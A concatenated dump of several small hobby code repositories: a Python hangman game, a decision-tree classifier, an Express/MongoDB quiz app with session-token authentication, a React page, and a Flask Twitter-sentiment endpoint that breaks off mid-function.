The user has to guess a word that is passed as a string through a function.
A part of the MIT 6.00.1x course on edX.
Later forked using Java. Java version contains starting with random word and multiplayer
<file_sep>/src/hangman.py
def isWordGuessed(secretWord, lettersGuessed):
num = 0
for i in range(0,len(secretWord)):
if secretWord[i] in lettersGuessed:
num +=1
if num == len(secretWord):
return True
else:
return False
def getGuessedWord(secretWord, lettersGuessed):
guess = []
for i in range(0,len(secretWord)):
if secretWord[i] in lettersGuessed:
guess.append(secretWord[i] + ' ' )
else:
guess.append('_' +' ')
return "".join(guess)
def getAvailableLetters(lettersGuessed):
import string
alpha = list(string.ascii_lowercase)
for i in range(len(lettersGuessed)):
alpha.remove(lettersGuessed[i])
return "".join(alpha)
def hangman(secretWord):
'''
secretWord: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secretWord contains.
* Ask the user to supply one guess (i.e. letter) per round.
* The user should receive feedback immediately after each guess
about whether their guess appears in the computers word.
* After each round, you should also display to the user the
partially guessed word so far, as well as letters that the
user has not yet guessed.
Follows the other limitations detailed in the problem write-up.
'''
print 'Welcome to the game, Hangman!'
print 'I am thinking of a word that is ' + str(len(secretWord)) + ' letters long.'
print '-----------'
lettersGuessed = []
nguess = 8
while nguess>0:
print 'You have ' +str(nguess)+' guesses left.'
print 'Available letters: ' + getAvailableLetters(lettersGuessed)
guess = raw_input('Please guess a letter: ')
guess = guess.lower()
if isWordGuessed(guess, lettersGuessed) == True:
print "Oops! You've already guessed that letter: " + getGuessedWord(secretWord, lettersGuessed)
print '-----------'
elif isWordGuessed(guess, list(secretWord)) == True:
lettersGuessed.append(guess)
print 'Good guess: '+ getGuessedWord(secretWord, lettersGuessed)
print '-----------'
if isWordGuessed(secretWord, lettersGuessed) == True:
break
else:
lettersGuessed.append(guess)
nguess -= 1
print "Oops! That letter is not in my word: " + getGuessedWord(secretWord, lettersGuessed)
print '-----------'
if isWordGuessed(secretWord, lettersGuessed) == True:
print 'Congratulations, you won!'
elif nguess == 0:
print "Sorry, you ran out of guesses. The word was " + secretWord +'.'
| 0e7f41fdf62f0551b5d6ad5791575378755f4a7d | [
"Markdown",
"Python"
] | 2 | Markdown | HayWiir/Hangman | 2faef54a1c7eba5af1975a7218452fa5be2fc3f9 | eb953df5a3edba3a4462c4a574f879d5b684d3fb |
refs/heads/master | <file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 18:08:39 2019
Decision Tree Algorithm
@author: <NAME>
"""
import sys
from random import randint
from tree import Node
from tree import LeafNode
from tree import Instance
# Fields
categories = []
attributes = []
trainingInstances = []
testInstances = []
global baseline
global baselineProbability
def readFiles(trainingFileName, testFileName):
with open(trainingFileName) as trainingFile:
# get categories
line = trainingFile.readline()
for word in line.split():
categories.append(word)
# get attributes
line = trainingFile.readline()
for word in line.split():
attributes.append(word)
loadInstances(trainingFile, trainingInstances)
with open(testFileName) as testFile:
# skip headers
testFile.readline()
testFile.readline()
loadInstances(testFile, testInstances)
def loadInstances(file, instancesList):
for line in file.readlines():
if len(line) <= 1:
continue
instancesList.append(Instance(line.split()))
def buildTree(instances, currentAttributes):
# if instances list is empty
if not instances:
return LeafNode(baseline, baselineProbability)
# if instances are pure, return a leaf node
trueList = []
falseList = []
for instance in instances:
classifyCategory(instance, trueList, falseList)
if not (trueList and falseList):
return LeafNode(instance.attributeList[0], 1)
# if attributes are empty, return a leaf node
if not currentAttributes:
if len(trueList) > len(falseList):
return LeafNode(categories[0], (len(trueList)/len(instances)))
elif len(trueList) < len(falseList):
return LeafNode(categories[1], (len(falseList)/len(instances)))
else:
randomInt = randint(0,1)
if (randomInt == 0):
return LeafNode(categories[0], (len(trueList)/len(instances)))
else:
return LeafNode(categories[1], (len(falseList)/len(instances)))
trueList = []
falseList = []
bestImpurity = 1.1
bestAttributeIndex = 0
#Finding purist attribute
# i + 1 because instance.attributeList includes class at start
for i, attribute in enumerate(currentAttributes):
tempTrueList = []
tempFalseList = []
index = attributes.index(attribute)
for instance in instances:
# add the instance to true or false for the attribute
if not isinstance(instance, Instance):
raise TypeError
if instance.attributeList[index+1] == "true":
tempTrueList.append(instance)
elif instance.attributeList[index+1] == "false":
tempFalseList.append(instance)
else:
raise ValueError
impurity = computeImpurity(tempTrueList, tempFalseList)
if (impurity <= bestImpurity):
bestImpurity = impurity
trueList = tempTrueList
falseList = tempFalseList
bestAttributeIndex = i
# Build subtrees
unusedAttributes = currentAttributes[0:bestAttributeIndex] + currentAttributes[bestAttributeIndex+1:len(currentAttributes)]
left = buildTree(trueList, unusedAttributes)
right = buildTree(falseList, unusedAttributes)
return Node(currentAttributes[bestAttributeIndex], left, right)
def classifyCategory(instance, trueList, falseList):
if not isinstance(instance, Instance):
raise TypeError
if instance.attributeList[0] == categories[0]:
trueList.append(instance)
elif instance.attributeList[0] == categories[1]:
falseList.append(instance)
else:
raise ValueError
def computeImpurity(trueList, falseList):
numOfInstances = len(trueList) + len(falseList)
impurityTrue = calculateImpurity(trueList) * (len(trueList) / numOfInstances)
impurityFalse = calculateImpurity(falseList) * (len(falseList) / numOfInstances)
return impurityTrue + impurityFalse
# calculate impurity of given instances
def calculateImpurity(branchInstances):
outcome1 = 0
outcome2 = 0
for instance in branchInstances:
if instance.attributeList[0] == categories[0]:
outcome1 += 1
elif instance.attributeList[0] == categories[1]:
outcome2 += 1
else:
raise ValueError
if len(branchInstances) == 0:
return 0
return ((outcome1/len(branchInstances)) * (outcome2/len(branchInstances)))
def classifyTestInstances(rootNode):
correct = []
incorrect = []
for i, instance in enumerate(testInstances):
classification = classify(instance, i, rootNode)
if (classification == instance.attributeList[0]):
correct.append(instance)
else:
incorrect.append(instance)
print("DT Accuracy = " + str(len(correct)/len(testInstances)*100))
def classify(instance, instanceIndex, node):
if isinstance(node, Node):
attIndex = attributes.index(node.getAttribute)
attributeForTest = testInstances[instanceIndex].attributeList[attIndex+1]
if attributeForTest == "true":
return classify(instance, instanceIndex, node._left)
elif attributeForTest == "false":
return classify(instance, instanceIndex, node._right)
else:
print(attributeForTest)
raise ValueError
elif isinstance(node, LeafNode):
return node._classification
else:
raise TypeError
def computeBaseline():
yes = []
no = []
classifyTraining(yes, no)
global baseline
global baselineProbability
# Set baseline to most popular classification
if len(no) < 1 and len(yes) < 1:
raise ValueError
if len(yes) > len(no):
baseline = yes[0].attributeList[0]
baselineProbability = len(yes)/len(trainingInstances)
elif len(yes) <= len(no):
baseline = no[0].attributeList[0]
baselineProbability = len(no)/len(trainingInstances)
else:
raise ValueError
def classifyTraining(yesList, noList):
for instance in trainingInstances:
if instance.attributeList[0] == categories[0]:
yesList.append(instance)
elif instance.attributeList[0] == categories[1]:
noList.append(instance)
else:
raise ValueError
def classifyUsingBaseline():
correct = []
for i, instance in enumerate(testInstances):
if testInstances[i].attributeList[0] == baseline:
correct.append(instance)
print("Baseline Accuracy = " + str(len(correct)/len(testInstances)*100))
#def classifyTestInstances(rootNode):
def main():
readFiles(sys.argv[1], sys.argv[2])
print(testInstances[len(testInstances)-1].attributeList)
print()
computeBaseline()
print(trainingInstances == trainingInstances.copy())
rootNode = buildTree(trainingInstances.copy(), attributes.copy())
rootNode.report("")
classifyTestInstances(rootNode)
classifyUsingBaseline()
main()
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 18:34:53 2019
@author: <NAME>
"""
class DecisionTree:
def __init__():
print()<file_sep># How to execute
- Fork the directory
- Open your terminal from the project's directory
- Run the following command:
> python mainDT.py hepatitis-training.dat hepatitis-test.dat
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 18:34:53 2019
@author: <NAME>
"""
class Node:
def __init__(self, attribute, left, right):
self._attribute = attribute
self._left = left
self._right = right
def report(self, indent):
print(indent + self._attribute + " = True:")
self._left.report(indent+"| ");
print(indent + self._attribute + " = False:")
self._right.report(indent+"| ");
@property
def getAttribute(self):
return self._attribute
class LeafNode:
def __init__(self, classification, probability):
self._classification = classification
self._probability = probability
def report(self, indent):
print(str(indent) + "Class: " + str(self._classification) + " /|\ Prob = " + "{0:.2f}".format(self._probability))
class Instance:
def __init__(self, attributes):
self._attributes = attributes
return
@property
def attributeList(self):
return self._attributes | 6eec65b64d6f3d293ac1812815c323be2c25292f | [
"Markdown",
"Python"
] | 4 | Python | alistairgraham/Decision-Tree-Algorithm | 73a61a37642d048c7e0da8148aa097804e91d530 | 6e84250f5e065dde603cac51156d3a8f683e61c3 |
refs/heads/master | <file_sep>// Determine whether navbar would occlude canvas.
// If not: Show it!
function unfoldNavbarIfPossible () {
var canvasHeight = $("section.quizpage")[0].offsetHeight;
var canvasMarginTop = parseInt($(".app-container").css("margin-top").split("px")[0]);
var viewportHeight = window.innerHeight;
var navbarHeight = $(".nvg")[0].offsetHeight + $(".nvg-counter")[0].offsetHeight;
if (viewportHeight - (canvasHeight + canvasMarginTop) > navbarHeight) {
$(".nvg").addClass("nvg-unfold");
} else {
$(".nvg").removeClass("nvg-unfold");
}
}
$(function(){
var carousel = $("#navcarousel").owlCarousel({
center: true,
items: 13,
margin: 20,
responsive: {
0: {
items: 1
},
320: {
items: 3
},
768: {
items: 5
},
992: {
items: 7
},
1170: {
items: 9
}
},
startPosition: 2
});
unfoldNavbarIfPossible();
$(window).resize(unfoldNavbarIfPossible);
$(document).on("scroll", function(){
$(".nvg").removeClass("nvg-unfold");
});
$(".nvg-counter").on("click touchstart",function(){
$(".nvg").toggleClass("nvg-unfold");
})
.on("mouseover", function(){
$(".nvg").addClass("nvg-unfold");
});
$(".nvg-directions_arrow-left").on("click touch", function(){
carousel.trigger("prev.owl.carousel");
});
$(".nvg-directions_arrow-right").on("click touch", function(){
carousel.trigger("next.owl.carousel");
});
$(".owl-item").on("click touch", function(){
var index = $(this).index();
$(".nvg-imgList_item.selected").removeClass("selected").addClass("unselected");
$(this).find(".nvg-imgList_item").removeClass("unselected").addClass("selected");
carousel.trigger("to.owl.carousel", index);
});
$(window).on("resize orientationChange", function(){
});
});<file_sep># Allgäu or not?
Green hills, mountains, wooden huts, cows - things Germans usually associate with an alpine region called [Allgäu](http://www.allgaeu.de) ("Ull-goy"). But in fact these things exist everywhere in the world. Or is it half the world copying this magnificiently beautiful area that happens to be my home region?
So here's the test: Can you separate the wheat from the chaff? Are these pictures from Allgäu - or not?
### About this package
This repository contains the node app that serves the *Allgäu or not* quiz. It will soon be hosted under http://allgaeu.mgschoen.de.<file_sep>function authenticate() {
var apiTicket = $('#wrapper').attr('data-api-ticket');
var signature = md5(apiTicket + navigator.userAgent);
$.ajax({
method: 'POST',
url: '/session/auth/' + signature + '/',
data: {}
}).done(function(response){
$('#response-wrapper').text(response.accessToken);
});
}<file_sep>var express = require('express');
var md5 = require('md5');
var router = express.Router();
// POST: No signature provided
router.post('/', function(req, res) {
res.send('Authentication failed');
});
/** Authentication route for Session API.
* If the client submits a correct signature to this route,
* an access token is generated, stored and returned to the
* client.
* For more information on the authentication process see
* the documentation.
*/
router.post('/:sig', function(req, res) {
var db = req.db;
var hashCollection = db.get('sessions.hashes');
var submittedSignature = req.params.sig;
// Search for submitted signature
hashCollection.find({
'signature': submittedSignature
}, function(e,result){
if (e === null) {
// Is signature unique?
if (result.length === 1) {
var ticket = result[0].ticket;
// Is ticket younger than 60 seconds?
var ticketCreationDate = result[0].creationDate.valueOf();
var now = new Date().valueOf();
if ((now - ticketCreationDate) < 60000) {
// Remove used ticket and signature from hash collection
hashCollection.remove({'signature': submittedSignature}, function (f) {
if (f === null) {
// Generate new access token and insert it to tokens collection
var tokenCollection = db.get('sessions.tokens');
var accessToken = md5((new Date()).valueOf().toString() + Math.random().toString());
tokenCollection.insert({
'accessToken': accessToken,
'creationDate': new Date(),
'signature': submittedSignature
}, {}, function (g) {
if (g === null) {
// Respond with access token
res.json({
'success': true,
'accessToken': accessToken,
'message': 'Authentication success, ticket ' + ticket + ' consumed'
});
return true;
} else {
// Storing Token failed
console.error('[ERROR] Error storing access token');
res.json(jsonError('Internal server error. Please try again'));
return false;
}
});
} else {
// Removing hash failed
console.error('[ERROR] Error removing ticket ' + ticket + ' from hash collection');
res.json(jsonError('Internal server error. Please try again'));
return false;
}
});
} else {
// Ticket timed out
console.log('[INFO] Ticket ' + ticket + ' has already timed out. Incoming connection refused.');
hashCollection.remove({'signature': submittedSignature}, function (h) {
if (h !== null) {
console.error('[ERROR] Failed to remove ticket from hash collection');
}
});
res.json(jsonError('Ticket timed out, authentication failed'));
return false;
}
}
else if (result.length > 1) {
// Signature not unique
console.error('[ERROR] Signature ' + submittedSignature + ' is not unique!');
res.json(jsonError('Internal server error. Please try again'));
return false;
} else {
// Signature not found
console.log('[INFO] Authentication request rejected: Signature ' + submittedSignature + ' was not found.');
res.json(jsonError('Signature incorrect, authentication failed'));
return false;
}
} else {
// Other error
console.error('[ERROR] ' + e.message);
res.json(jsonError('Internal server error. Please try again'));
}
});
});
/** Create a new hash consisting of ticket, signature and timestamp
* and insert it to the database. This method is exported.
* @param hashCollection - monk collection object
* @param individualString - string that together with the ticket gets hashed to the signature
* @param callback - function to execute when insertion was performed
*/
var insertHash = function (hashCollection, individualString, callback) {
var ticket = md5((new Date()).valueOf().toString() + Math.random().toString());
var signature = md5(ticket + individualString);
var hash = {
'creationDate': new Date(),
'signature': signature,
'ticket': ticket
};
hashCollection.insert(hash, function (e) {
if (e === null) {
callback(null, hash);
} else {
var error = {
'msg': 'Failed to write to database'
};
callback(error, hash);
}
});
};
/** Check if a token is a valid access token, e. g. it is
* part of the mongo collection sessions.tokens and it was not
* created more than 24 hours ago. This method is exported.
* @param tokensCollection - monk collection object
* @param token - md5 hashed string
* @param callback - function to execute after validation
*/
var isValidAccessToken = function (tokensCollection, token, callback) {
tokensCollection.find({
'accessToken': token
}, function(e,result){
if (e === null) {
if (result.length === 1) {
// Is token younger than 24 hours?
var tokenCreationDate = result[0].creationDate.valueOf();
var now = new Date().valueOf();
if ((now - tokenCreationDate) < 86400000) {
// Token valid
callback(null, true);
return true;
} else {
// Token timed out
console.log('[INFO] Token ' + token + ' has already timed out. Incoming connection refused.');
callback(jsonError('Token timed out'), false);
tokensCollection.remove({
'accessToken': token
}, function (f) {
if (f !== null) {
// Removing token failed.
// We log this but don't care any further because the
// cronjob will take care of this zombie token.
console.error('[ERROR] Failed to remove token ' + token);
return false;
}
// Removing token successful
return true;
});
}
} else if (result.length > 1) {
// Token not unique
console.error('[ERROR] Access token ' + token + ' is not unique');
callback(jsonError('Access token ' + token + ' is not unique'), false);
return false;
} else {
// Token not found
console.log('[INFO] Authentication request rejected: Access token ' + token + ' was not found.');
callback(jsonError('Invalid token'), false);
return false;
}
} else {
// Other error
console.error('[ERROR] Error validating token: ' + e.message);
callback(jsonError('Error validating token: ' + e.message), false);
return false;
}
});
}
// Shorthand for generating a json error object
var jsonError = function (message) {
var error = {
'success': false,
'message': message
};
return error;
};
module.exports = {
'router': router,
'insertHash': insertHash,
'isValidAccessToken': isValidAccessToken
};
<file_sep>/*global module:false*/
module.exports = function(grunt) {
// Project configuration.
grunt.initConfig({
// Metadata.
pkg: grunt.file.readJSON('package.json'),
banner: '/*! <%= pkg.title || pkg.name %> - v<%= pkg.version %> - ' +
'<%= grunt.template.today("yyyy-mm-dd") %>\n' +
'<%= pkg.homepage ? "* " + pkg.homepage + "\\n" : "" %>' +
'* Copyright (c) <%= grunt.template.today("yyyy") %> <%= pkg.author.name %>; */\n',
// Task configuration.
concat: {
options: {
banner: '<%= banner %>',
stripBanners: true
},
dist: {
src: ['dev/javascripts/js/*.js'],
dest: 'dev/javascripts/concatenated/<%= pkg.name %>.js'
}
},
uglify: {
options: {
banner: '<%= banner %>'
},
dist: {
src: '<%= concat.dist.dest %>',
dest: 'dev/javascripts/compiled/<%= pkg.name %>.min.js'
}
},
copy: {
css: {
src: 'dev/stylesheets/compiled/style.css',
dest: 'public/stylesheets/style.css',
options: {
process: function (content) {
return content.replace(/\n\n\/\*# sourceMappingURL=.*\.css\.map \*\//g, '');
}
}
},
js: {
src: '<%= uglify.dist.dest %>',
dest: 'public/javascripts/<%= pkg.name %>.min.js'
},
md5: {
src: 'node_modules/js-md5/build/md5.min.js',
dest: 'public/plugins/js-md5/md5.min.js'
},
owlcarousel: {
expand: true,
cwd: 'node_modules/owl.carousel/dist/',
src: '**',
dest: 'public/plugins/owl-carousel/'
}
},
jshint: {
options: {
curly: true,
eqeqeq: true,
immed: true,
latedef: true,
newcap: true,
noarg: true,
sub: true,
undef: true,
unused: true,
boss: true,
eqnull: true,
browser: true,
globals: {}
},
gruntfile: {
src: 'Gruntfile.js'
}
},
postcss: {
options: {
processors: [
require('autoprefixer')
]
},
dist: {
src: 'dev/stylesheets/compiled/style.css'
}
},
sass: {
dist: {
options: {
update: true
},
files: {
'dev/stylesheets/compiled/style.css': 'dev/stylesheets/scss/main.scss'
}
}
},
watch: {
gruntfile: {
files: '<%= jshint.gruntfile.src %>',
tasks: ['jshint:gruntfile']
},
stylesheets: {
files: ['dev/stylesheets/scss/*.scss'],
tasks: ['sass', 'postcss', 'copy:css']
},
javascripts: {
files: ['dev/javascripts/js/*.js'],
tasks: ['concat', 'uglify', 'copy:js']
}
}
});
// These plugins provide necessary tasks.
grunt.loadNpmTasks('grunt-contrib-concat');
grunt.loadNpmTasks('grunt-contrib-copy');
grunt.loadNpmTasks('grunt-contrib-uglify');
grunt.loadNpmTasks('grunt-contrib-jshint');
grunt.loadNpmTasks('grunt-contrib-sass');
grunt.loadNpmTasks('grunt-contrib-watch');
grunt.loadNpmTasks('grunt-postcss');
// Default task. Builds static .css and .js files.
grunt.registerTask('default', ['sass', 'concat', 'uglify', 'copy']);
};
<file_sep>var auth = require('./auth.js');
var express = require('express');
var router = express.Router();
const VALID_ANSWER_VALUES = ['yes','no',null];
router.post('/', function(req, res) {
res.send('Authentication failed');
});
router.get('/:token', function(req, res){
var db = req.db;
var tokensCollection = db.get('sessions.tokens');
auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
if (e === null && valid) {
res.json({
'success': true,
'message': 'Congrats! Your access token is totally valid'
});
} else if (e === null) {
res.json({
'success': false,
'message': 'There has been an error processing your request'
});
} else {
res.json({
'success': false,
'message': e.message
});
}
});
});
/** Start a new session by GET-ing /session/:at/start
* This route creates a new user session on the server side,
* saves it to the database and responds with a JSON-object
* containing info about the session.
*/
router.get('/:token/start', function(req,res){
var db = req.db;
var contentCollection = db.get('content');
var sessionCollection = db.get('sessions');
var tokensCollection = db.get('sessions.tokens');
var sessionToInsert = {
'answers': {},
'closed': null,
'started': new Date(),
'status': 'in-progress'
};
// Validate access token
auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
// Token valid
if (e === null && valid) {
try {
// Determine all currently available content documents (e.g. quiz questions)
contentCollection.find({}, function(f,docs){
if (f === null) {
// Add each document's id to the answers object of the new session
for (var i = 0; i < docs.length; i++) {
var id = docs[i]._id;
sessionToInsert.answers[id] = null;
}
// Store the new session in mongo collection sessions
sessionCollection.insert(sessionToInsert, function(g, result){
if (g === null) {
// Respond with info about the generated session
res.json({
'message': '',
'session': sessionToInsert,
'success': true
});
return true;
} else {
// Error inserting session to collection
console.error('[ERROR] ' + g.message);
res.json({
'success': false,
'message': g.message
});
return false;
}
});
} else {
// Error searching collection
console.error('[ERROR] ' + f.message);
res.json({
'success': false,
'message': f.message
});
return false;
}
});
} catch (g) {
console.error('[ERROR] Error starting session: ' + g.message);
res.json({
'success': false,
'message': 'Error starting session: ' + f.message
});
return false;
}
// Authentication errors
} else if (e === null) {
res.json({
'success': false,
'message': 'There has been an error processing your request'
});
} else {
res.json({
'success': false,
'message': e.message
});
}
});
});
/** Retrieve session object by GET-ing /session/:token/get/:id
* This route responds with the database entry of the session with
* the specified ID. If no such session exists, it responds with an
* error object.
*/
router.get('/:token/get/:id', function(req,res){
var db = req.db;
var sessionsCollection = db.get('sessions');
var tokensCollection = db.get('sessions.tokens');
var idToGet = req.params.id;
// Validate access token
auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
// Token valid?
if (e === null && valid) {
try {
// Search for provided ID in sessions collection
sessionsCollection.find({
'_id': idToGet
}, function(f, result){
if (f === null) {
var numResults = result.length;
if (numResults === 1) {
// Session found
// Respond with JSON object of session
res.json({
'message': '',
'session': result[0],
'success': true
});
return true;
} else if (numResults > 1) {
// Session not unique
console.error('[ERROR] Session duplicate found: Found ' + numResults + ' sessions with ID ' + idToGet);
res.json({
'success': false,
'message': 'Internal server error. Please try again.'
});
return false;
} else {
// Session not found
res.json({
'success': false,
'message': 'Session with ID ' + idToGet + ' does not exist.'
});
return true;
}
} else {
// Error searching collection
console.error('[ERROR] ' + f.message);
res.json({
'success': false,
'message': f.message
});
return false;
}
});
} catch (g) {
// Error searching collection
console.error('[ERROR] ' + g.message);
res.json({
'success': false,
'message': g.message
});
return false;
}
// Authentication errors
} else if (e === null) {
res.json({
'success': false,
'message': 'There has been an error processing your request'
});
} else {
res.json({
'success': false,
'message': e.message
});
}
});
});
/** In a specified session, update the value of an existing answer or
* set a new answer value by POST-ing to
*
* /session/:token/set/:sid/answer/:aid/val/:value
*
* where
*
* :token is the access token,
* :sid is the ID of the session to change,
* :aid is the ID of the answer to change and
* :value is the new value the answer should get assigned.
*
* In case of success, this route responds with the updated session
* object. Otherwise it responds with an error object.
*/
router.post('/:token/set/:sid/answer/:aid/val/:value', function(req,res){
var db = req.db;
var sessionsCollection = db.get('sessions');
var tokensCollection = db.get('sessions.tokens');
var submittedSessionID = req.params.sid;
var submittedAnswerID = req.params.aid;
var submittedAnswerVal = req.params.value;
// Validate access token
auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
// Token valid?
if (e === null && valid) {
// Submitted answer ID valid?
var regexMongoID =/^([a-f]|[0-9]){24}$/;
if (regexMongoID.test(submittedAnswerID)) {
// Submitted answer value valid?
if (VALID_ANSWER_VALUES.indexOf(submittedAnswerVal) > -1) {
try {
// Search for session
sessionsCollection.findOne(
{ '_id': submittedSessionID },
function (f, sessionFound) {
if (f === null && sessionFound !== null) {
// Is session still open?
if (sessionFound.status !== 'closed') {
var updateQuery = {};
updateQuery['answers.' + submittedAnswerID] = submittedAnswerVal;
// Update session
sessionsCollection.findOneAndUpdate(
{'_id': submittedSessionID},
{$set: updateQuery},
function (g, updatedSession) {
if (g === null) {
res.json({
'message': '',
'session': updatedSession,
'success': true
});
return true;
} else {
console.log('[ERROR] Error while setting answer value: ' + e.message);
res.json({
'success': false,
'message': 'Error while setting answer value: ' + e.message
});
return false;
}
}
);
} else {
// Session already closed
console.error('[ERROR] Session with ID ' + submittedSessionID + ' is already closed. Edit request rejected.');
res.json({
'success': false,
'message': 'Session with ID ' + submittedSessionID + ' is already closed and can not be edited'
});
return false;
}
} else if (f === null) {
// No session found
console.error('[ERROR] Session with ID ' + submittedSessionID + ' was not found.');
res.json({
'success': false,
'message': 'Session with ID ' + submittedSessionID + ' was not found'
});
return false;
} else {
// Error searching for session
console.error('[ERROR] Error searching collection: ' + f.message);
res.json({
'success': false,
'message': 'Internal server error. Please try again.'
});
return false;
}
}
);
} catch (g) {
// Exception while accessing database
console.error('[ERROR] ' + g.message);
res.json({
'success': false,
'message': g.message
});
return false;
}
} else {
// Submitted answer value invalid
console.log('[ERROR] Submitted answer value ' + submittedAnswerVal + ' is invalid');
res.json({
'success': false,
'message': 'Submitted answer value ' + submittedAnswerVal + ' is invalid'
});
return false;
}
} else {
// Submitted answer ID invalid
console.log('[ERROR] Submitted answer ID ' + submittedAnswerID + ' is invalid');
res.json({
'success': false,
'message': 'Submitted answer value ' + submittedAnswerID + ' is invalid'
});
return false;
}
// Authentication errors
} else if (e === null) {
res.json({
'success': false,
'message': 'There has been an error processing your request'
});
} else {
res.json({
'success': false,
'message': e.message
});
}
});
});
/** Close an existing session by POST-ing to /session/:token/set/:id/close
* This route changes the status of a session to 'closed'
* and saves the current time as time of termination. A
* closed session cannot be changed any further. However,
* it can still be read by GET-ing the /session/:token/get/:id
* route.
*/
router.post('/:token/set/:id/close', function(req,res){
var db = req.db;
var sessionsCollection = db.get('sessions');
var tokensCollection = db.get('sessions.tokens');
var submittedSessionID = req.params.id;
// Validate access token
auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
// Token valid?
if (e === null && valid) {
try {
// Search for session
sessionsCollection.findOne(
{ '_id': submittedSessionID },
function (f, sessionFound) {
if (f === null && sessionFound !== null) {
// Is session still open?
if (sessionFound.status !== 'closed') {
// DB query: set status to closed and current
// time as time of session termination
var updateQuery = {
'closed': new Date(),
'status': 'closed'
};
// Update session
sessionsCollection.findOneAndUpdate(
{'_id': submittedSessionID},
{$set: updateQuery},
function (g, updatedSession) {
if (g === null) {
res.json({
'message': '',
'session': updatedSession,
'success': true
});
return true;
} else {
console.log('[ERROR] Error closing session: ' + e.message);
res.json({
'success': false,
'message': 'Error closing session: ' + e.message
});
return false;
}
}
);
} else {
// Session already closed
console.error('[ERROR] Session with ID ' + submittedSessionID + ' is already closed. Close request rejected.');
res.json({
'success': false,
'message': 'Session with ID ' + submittedSessionID + ' is already closed'
});
return false;
}
} else if (f === null) {
// No session found
console.error('[ERROR] Session with ID ' + submittedSessionID + ' was not found.');
res.json({
'success': false,
'message': 'Session with ID ' + submittedSessionID + ' was not found'
});
return false;
} else {
// Error searching for session
console.error('[ERROR] Error searching collection: ' + f.message);
res.json({
'success': false,
'message': 'Internal server error. Please try again.'
});
return false;
}
}
);
} catch (g) {
// Exception while accessing database
console.error('[ERROR] ' + g.message);
res.json({
'success': false,
'message': g.message
});
return false;
}
// Authentication errors
} else if (e === null) {
res.json({
'success': false,
'message': 'There has been an error processing your request'
});
} else {
res.json({
'success': false,
'message': e.message
});
}
});
});
module.exports = {
'auth': auth,
'router': router
};
| 6d2c892575e7335214b1f2f3cf0121af80058a32 | [
"JavaScript",
"Markdown"
] | 6 | JavaScript | mgschoen/allgaeu | aeb22c6832eed2839d03b3027e35567dd315b3b6 | 346684510e1cbd124cd6ade3c59fe1772318bc61 |
refs/heads/master | <file_sep>import React, { Component } from 'react'
import { ApolloProvider } from 'react-apollo'
import { Switch, Route, BrowserRouter as Router } from 'react-router-dom'
import { ThemeProvider } from 'styled-components'
import './index.css'
import theme from './theme'
import client from './client'
import Home from './containers/Home/'
import Ethan from './containers/Ethan/'
class App extends Component {
render() {
return (
<Router>
<ThemeProvider theme={theme}>
<ApolloProvider client={client}>
<div className="App">
<div className="NavBar">
<a href="/">Home</a>
<a href="/Ethan-Baird">Ethan</a>
</div>
<Switch>
<Route exact path="/" component={Home} />
<Route path="/Ethan-Baird" component={Ethan} />
</Switch>
</div>
</ApolloProvider>
</ThemeProvider>
</Router>
)
}
}
export default App
<file_sep>import { ApolloClient } from 'apollo-client'
import { InMemoryCache } from 'apollo-cache-inmemory'
import { ApolloLink } from 'apollo-link'
import { HttpLink } from 'apollo-link-http'
import config from './config'
const client = new ApolloClient({
link: ApolloLink.from([
new HttpLink({
uri: config.graphqlUrl,
credentials: 'same-origin'
})
]),
cache: new InMemoryCache()
})
export default client
<file_sep>**Desired Behavior:**
**Preparation:**
**Action Steps:**
- [ ] step 1
- details
<file_sep>import React, { Component } from 'react'
import './index.css'
class Ethan extends Component {
render() {
return (
<div className="Python">
<h>
Hello Python World!
</h>
<p>
I will tell you that this website is the best!
</p>
</div>
)
}
}
export default Ethan | 6a68eac521a9a5a559af1fc772bd8cc8b42a3766 | [
"JavaScript",
"Markdown"
] | 4 | JavaScript | ebaird492/Web2 | 59b8ee6181f5d0fb733f17bb64bcefa085ac11dc | 0dc4f459f2605fbdeed0bbb0ab641ae9b56d9678 |
refs/heads/master | <file_sep>from flask import Flask, request, jsonify
import re, string
import pickle
import requests
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
from nltk.stem.wordnet import WordNetLemmatizer
from flask_cors import CORS, cross_origin
from dotenv import load_dotenv
from PyDictionary import PyDictionary
dictionary=PyDictionary()
load_dotenv()
import os
app = Flask(__name__)
cors = CORS(app)
def remove_noise(tweet_tokens, stop_words = ()):
cleaned_tokens = []
for token, tag in pos_tag(tweet_tokens):
token = re.sub('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|'\
'(?:%[0-9a-fA-F][0-9a-fA-F]))+','', token)
token = re.sub("(@[A-Za-z0-9_]+)","", token)
if tag.startswith("NN"):
pos = 'n'
elif tag.startswith('VB'):
pos = 'v'
else:
pos = 'a'
lemmatizer = WordNetLemmatizer()
token = lemmatizer.lemmatize(token, pos)
if len(token) > 0 and token not in string.punctuation and token.lower() not in stop_words:
cleaned_tokens.append(token.lower())
return cleaned_tokens
def getSentiment(query):
# Loading
f = open('my_classifier.pickle', 'rb')
classifier = pickle.load(f)
f.close()
url = "https://api.twitter.com/1.1/search/tweets.json?q=" + query + "&result_type=mixed&count=100&lang=en&tweet_mode=extended"
bearerToken = os.environ.get("bearerToken")
headers = {
'Authorization': 'Bearer ' + bearerToken,
'Cookie': 'personalization_id="v1_4uBj+Xmfoj7IhxyR5B/adg=="; guest_id=v1%3A159473130844397528; lang=en'
}
response = requests.request("GET", url, headers=headers)
texts = []
tweets = response.json()['statuses']
for tweet in tweets:
texts.append(tweet['full_text'])
nOfPos = 0
for text in texts:
custom_tokens = remove_noise(word_tokenize(text))
if classifier.classify(dict([token, True] for token in custom_tokens)) == 'Positive':
nOfPos+=1
return nOfPos/len(texts)*100
@app.route('/api/v1/search')
def hello():
print(request.args['query'])
#synonyms
simWords=dictionary.synonym(request.args['query'])
countWords=0
if simWords<5:
countWords=len(simWords)
simPercent=[0]*len(simWords)
else:
countWords=5
simPercent=[0]*5
for i in range(countWords):
simPercent[i]=getSentiment(simWords[i])
